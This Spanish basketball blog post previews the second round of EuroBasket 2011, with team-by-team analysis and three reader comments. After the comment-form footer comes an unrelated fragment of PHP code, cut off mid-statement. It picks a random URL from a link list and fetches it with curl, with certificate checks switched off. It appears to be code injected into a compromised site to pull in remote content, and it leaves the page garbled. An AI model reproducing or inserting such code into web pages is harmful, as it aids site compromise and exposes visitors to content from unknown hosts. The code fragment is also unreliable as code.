EuroNBAsket 2011: Previa a la segunda ronda

07 de September de 2011 por TheDeerHunter

Terminada la primera ronda con el esperado regusto a bacalá. El baloncesto de nivel en Europa no resiste 24 ejemplos. Selecciones como Portugal o Bélgica han llegado aquí a hacer el ridículo y otras selecciones se han aprovechado de la desigual distribución del cuadro o de la falta de exigencia de esta primera fase para no hacerlo. Con todo sí hemos visto algunos duelos bonitos, ciertos picos de buen baloncesto y eliminaciones más o menos ilustres como las de Croacia o Italia.

Proponiendo un primer quinteto no demasiado purista de la primera fase me quedaría con Parker, McCalebb, Deng, Nowitzki y Pau con un único representante no NBA.

Con la eliminación del 50% de selecciones iniciales el regusto a bacalá no termina. La culpa la tiene el fatídico cuadro. Cualquiera de los favoritos parece estar en condiciones de destrozar a Finlandia o Georgia, por no nombrar a Grecia o Macedonia que podrían resultar peritas en dulce para un posible cuadro.

GRUPO E

Francia: Parten como imbatidos e increíblemente como los más ofensivos del grupo. Incontestable nivel de Tony Parker y un nivel colectivo que no les veíamos en años. Presentan su habitual poderío físico como máxima virtud pero además han mostrado un infrecuente buen acierto exterior e inteligencia y oficio en los momentos clave. Muy buen nivel de los NBA, en especial de un Boris Diaw renacido. Con todo no deben confiarse para amarrar la victoria que les hace falta.

Serbia: No siguen imbatidos por un suspiro. Se han mostrado vulnerables defensivamente pero clarividentes en ataque. Una de las rotaciones más completas y de mayor talento del campeonato. A la garantía que supone Teodosic se está uniendo el extraordinario rendimiento de la parejita Krstic-Savanovic. Veremos cómo digieren juegos interiores mucho más físicos, pero parece imposible que no alcancen los cruces.

España: Más sombras que luces pero han mostrado el punto más alto de rendimiento de todo el campeonato. Podemos hacer un símil con los Lakers y si Navarro&Pau funcionan será difícil que alguien les resista. Buen nivel de Rudy y Marc, también del sufrido Reyes. Más que irregular, sin embargo, del resto del equipo. Depende de ellos y cuentan con el beneficio de la duda, pero… El calendario tampoco les beneficia demasiado.

Turquía: Son los que más cerca han estado de la eliminación del grupo. Es un equipo con todo para el éxito pero con tendencia al caos. Su personalidad es reflejo de la de su teórico líder, Hedo Turkoglu, pero cuentan con dos excelentes sorpresas del campeonato, Kanter y Preldzic, que permiten amargarle la vida a cualquiera. Veremos qué cara vemos de ellos en la hora de la verdad.

Lituania: Aún les debe durar el dolor de la humillación de España. Veremos si la pérdida de Petravicius puede resultar positiva para ellos. Han mostrado un gran rendimiento ataque-defensa pero se les ve algo pasados. Diría que van a necesitar todo el factor de locales para alcanzar los cruces.

Alemania: Nowitzki es siempre Nowitzki pero el resto siempre es el resto. Por falta de artillería tienen el menor promedio anotador del grupo. El rendimiento de más a menos de Kaman, junto con el balance que acumulan les condena a la eliminación, más pronto que tarde. Con todo se dejarán la vida hoy contra España.

GRUPO F

Macedonia: Una de las sensaciones del torneo que, gracias a la configuración del mismo, llega a estas alturas con un fantástico 2-0. La parejita McCalebb-Pero Antic llega fortísima. Estarán en los cruce pero más allá lo tienen claro.

Rusia: Los otros imbatidos del torneo. Cuentan con una defensa más que respetable y una excelente versión de AK47. Además, la rotación está funcionando bien con Mozgov, Kryapa, Fridzon o Vorontsevich. Sin despeinarse estarán en los cruces y son el equipo a evitar en ellos.

Slovenia: No enamoran pero sacan sus partidos adelante con solvencia. Todos conocemos el carácter ganador de su seleccionador. El haber logrado imprimirlo en sus pupilos ya es un punto para respetarles. Una de las mejores defensas como principal virtud. No hemos visto un Goran Dragic brillante, pero sí de su hermano Zoran, así como el siempre sólido Lorbek. Cuentan con talento y oficio suficientes para pasar de ronda y después que nadie se duerma con ellos.

Grecia: Sin sudar están aquí y posiblemente sin sudar pasarán de ronda. Tienen oficio para ello pero no talento para llegar más allá. Buen campeonato de Fotsis y también de Bourousis.

Georgia: 0 victorias acumuladas es demasiado déficit. Lo tienen muy difícil y cada partido será a vida o muerte. Diría que falta talento para salvar el envite. Muy buen campeonato de Sanikidze y Markoishvili, pero de momento Pachulia ha estado más bien normalito.

Finlandia: Se pueden dar con un canto en los dientes por haber llegado hasta aquí. Son los más ofensivos de esta parte del cuadro pero también son evidentemente los más vulnerables. Muchos haremos fuerza para que Koponen y los suyos logren alguna machada más.

Comenta

3 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Joe, impecable resumen. Sin nada que añadir. Con la victoria de España creo que todos respiramos más tranquilos. A pesar de que al final del tercer cuarto, han empezado a meter hombres extraños, como Herber y Hamman, que durante el año no dan un mal ruido y yo creo que solo les he visto jugar al baloncesto en su selección. Bueno, creo que andan en el Alba de Berlín los dos, pero estoy hablando de memoria, no estoy muy seguro de ello.

    Navarrito no está, Llull tampoco, así que en los minutos calientes hemos tenido que jugar con Rudy y San Eme. No ha ido mal. Mejor actitud defensiva sobre los aleros alemanes, y, oh milagro, Ricky se ha puesto a jugar al baloncesto. Yo me frotaba los ojos incrédulos. Aunque hay que decir que momentos antes estaba logrando convertir a Hamann y Schafartzik, o como se diga, en dos grandes bases.

    Pau espectacular en la segunda parte, demostrando que si está bien físicamente es el mejor jugador del campeonato, y hemos logrado desquiciar a Nowitzki. Eso nos da bastantes puntos para próximos choques. Pero no hay que relajarse. El próximo rival es Serbia. Yo creo que hoy perderán contra Lituania y se lo van a jugar todo contra España. Así que ya sabemos que no tenemos que hacer, lo que hicimos contra Turquía.

      Citar

  2. German dice:
    #2

    Increible lo desbalanceados que estan los grupos, al menos podremos disfrutar de grandes duelos en el E…

      Citar

  3. HisRoyalAirness dice:
    #3

    Sé que ya es la segunda vez que defiendo a Ricky pero…por qué cuando le hacen un bloqueo el segundo defensor no hacía la ayuda y los pivots no cerraban la zona?? Porque el genio de Iturriaga no paraba de echarle la culpa y esos desajustes defensivos son puramente tácticos (os acordais de CP3 haciéndole un traje a los Lakers por lo mismo?).
    Muy bien San Eme y bien Ricky dándole un poco de dinamismo al ataque e impidiendo pases fáciles a Dirk; por qué nadie intenta jugar pick&roll con el chaval? Me juego la vida a que España no entrena jugadas de ataque.
    De los “Gasoles” nada que decir; ÍDOLOS.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>